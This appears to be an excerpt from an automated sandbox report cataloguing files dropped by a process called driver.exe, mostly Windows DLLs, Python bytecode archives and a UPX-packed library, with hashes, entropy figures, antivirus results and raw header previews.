                                                                                                                                                                                                                                              SHA1:40C07A94045B17DAE8A02C1D2B49301FAD231152
                                                                                                                                                                                                                                              SHA-256:2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
                                                                                                                                                                                                                                              SHA-512:6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.918215004381039
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
                                                                                                                                                                                                                                              MD5:D4FBA5A92D68916EC17104E09D1D9D12
                                                                                                                                                                                                                                              SHA1:247DBC625B72FFB0BF546B17FB4DE10CAD38D495
                                                                                                                                                                                                                                              SHA-256:93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
                                                                                                                                                                                                                                              SHA-512:D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......UJ....`A.........................................................0...............0..x&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26216
                                                                                                                                                                                                                                              Entropy (8bit):4.882777558752248
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
                                                                                                                                                                                                                                              MD5:EDF71C5C232F5F6EF3849450F2100B54
                                                                                                                                                                                                                                              SHA1:ED46DA7D59811B566DD438FA1D09C20F5DC493CE
                                                                                                                                                                                                                                              SHA-256:B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
                                                                                                                                                                                                                                              SHA-512:481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@..h&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.738587310329139
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
                                                                                                                                                                                                                                              MD5:F9235935DD3BA2AA66D3AA3412ACCFBF
                                                                                                                                                                                                                                              SHA1:281E548B526411BCB3813EB98462F48FFAF4B3EB
                                                                                                                                                                                                                                              SHA-256:2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
                                                                                                                                                                                                                                              SHA-512:AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):5.202163846121633
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
                                                                                                                                                                                                                                              MD5:5107487B726BDCC7B9F7E4C2FF7F907C
                                                                                                                                                                                                                                              SHA1:EBC46221D3C81A409FAB9815C4215AD5DA62449C
                                                                                                                                                                                                                                              SHA-256:94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
                                                                                                                                                                                                                                              SHA-512:A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.866983142029453
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
                                                                                                                                                                                                                                              MD5:D5D77669BD8D382EC474BE0608AFD03F
                                                                                                                                                                                                                                              SHA1:1558F5A0F5FACC79D3957FF1E72A608766E11A64
                                                                                                                                                                                                                                              SHA-256:8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
                                                                                                                                                                                                                                              SHA-512:8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.828044267819929
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
                                                                                                                                                                                                                                              MD5:650435E39D38160ABC3973514D6C6640
                                                                                                                                                                                                                                              SHA1:9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
                                                                                                                                                                                                                                              SHA-256:551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
                                                                                                                                                                                                                                              SHA-512:7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):30328
                                                                                                                                                                                                                                              Entropy (8bit):5.14173409150951
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
                                                                                                                                                                                                                                              MD5:B8F0210C47847FC6EC9FBE2A1AD4DEBB
                                                                                                                                                                                                                                              SHA1:E99D833AE730BE1FEDC826BF1569C26F30DA0D17
                                                                                                                                                                                                                                              SHA-256:1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
                                                                                                                                                                                                                                              SHA-512:992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):4.883012715268179
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
                                                                                                                                                                                                                                              MD5:272C0F80FD132E434CDCDD4E184BB1D8
                                                                                                                                                                                                                                              SHA1:5BC8B7260E690B4D4039FE27B48B2CECEC39652F
                                                                                                                                                                                                                                              SHA-256:BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
                                                                                                                                                                                                                                              SHA-512:94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26208
                                                                                                                                                                                                                                              Entropy (8bit):5.023753175006074
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
                                                                                                                                                                                                                                              MD5:20C0AFA78836B3F0B692C22F12BDA70A
                                                                                                                                                                                                                                              SHA1:60BB74615A71BD6B489C500E6E69722F357D283E
                                                                                                                                                                                                                                              SHA-256:962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
                                                                                                                                                                                                                                              SHA-512:65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26232
                                                                                                                                                                                                                                              Entropy (8bit):5.289041983400337
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
                                                                                                                                                                                                                                              MD5:96498DC4C2C879055A7AFF2A1CC2451E
                                                                                                                                                                                                                                              SHA1:FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
                                                                                                                                                                                                                                              SHA-256:273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
                                                                                                                                                                                                                                              SHA-512:4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26232
                                                                                                                                                                                                                                              Entropy (8bit):5.284932479906984
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
                                                                                                                                                                                                                                              MD5:115E8275EB570B02E72C0C8A156970B3
                                                                                                                                                                                                                                              SHA1:C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
                                                                                                                                                                                                                                              SHA-256:415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
                                                                                                                                                                                                                                              SHA-512:B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22120
                                                                                                                                                                                                                                              Entropy (8bit):5.253102285412285
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
                                                                                                                                                                                                                                              MD5:001E60F6BBF255A60A5EA542E6339706
                                                                                                                                                                                                                                              SHA1:F9172EC37921432D5031758D0C644FE78CDB25FA
                                                                                                                                                                                                                                              SHA-256:82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
                                                                                                                                                                                                                                              SHA-512:B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):22136
                                                                                                                                                                                                                                              Entropy (8bit):4.810971823417463
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
                                                                                                                                                                                                                                              MD5:A0776B3A28F7246B4A24FF1B2867BDBF
                                                                                                                                                                                                                                              SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
                                                                                                                                                                                                                                              SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
                                                                                                                                                                                                                                              SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1396821
                                                                                                                                                                                                                                              Entropy (8bit):5.531015514770172
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:0W7WpzO6etYzGNcT1pz3YQfiBgDPtLwjFx278SAZQYF93BGfL+DuWFnjVpdxhYVd:l7WpzZSeT1xTYF9f5pdxhYVP05WdZ7
                                                                                                                                                                                                                                              MD5:18C3F8BF07B4764D340DF1D612D28FAD
                                                                                                                                                                                                                                              SHA1:FC0E09078527C13597C37DBEA39551F72BBE9AE8
                                                                                                                                                                                                                                              SHA-256:6E30043DFA5FAF9C31BD8FB71778E8E0701275B620696D29AD274846676B7175
                                                                                                                                                                                                                                              SHA-512:135B97CD0284424A269C964ED95B06D338814E5E7B2271B065E5EABF56A8AF4A213D863DD2A1E93C1425FADB1B20E6C63FFA6E8984156928BE4A9A2FBBFD5E93
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:PK..........!.+.P............._collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):111402
                                                                                                                                                                                                                                              Entropy (8bit):7.753948170787951
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:t92Wi8Vk9F8It7EH8U1qEYnLi96gJpqXqoJWhT2EkhYduSJ/uSiVxfx6TgEZ87oN:W8iM/AG9PYWhTFkh/mVIxf+NZQoJu2J
                                                                                                                                                                                                                                              MD5:1A11796F644617CB8BDFC56B2E9E3513
                                                                                                                                                                                                                                              SHA1:957DE7FEEB6790F0DE39B6F9A3908A555BB06828
                                                                                                                                                                                                                                              SHA-256:9D8B5FCDED7075D0AD60EBAFDB9C79B05DAB838D5D53C0300C853B92A13CF3D0
                                                                                                                                                                                                                                              SHA-512:4E5DB9C15B6F61D72EAAA192834CA14CB309E8770AA39F1CC1D1340BCEAAD8BDDFDBD369CC83733D8A05B63CA5A5FDB2D61BEE6C2B1DDE6407599EBAF34A9F8C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:PK.........R*Z..g............stub-o.pyc..........g...............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1630488
                                                                                                                                                                                                                                              Entropy (8bit):7.952879310777133
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
                                                                                                                                                                                                                                              MD5:8377FE5949527DD7BE7B827CB1FFD324
                                                                                                                                                                                                                                              SHA1:AA483A875CB06A86A371829372980D772FDA2BF9
                                                                                                                                                                                                                                              SHA-256:88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
                                                                                                                                                                                                                                              SHA-512:C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\driver.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29968
                                                                                                                                                                                                                                              Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                              MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                              SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                              SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
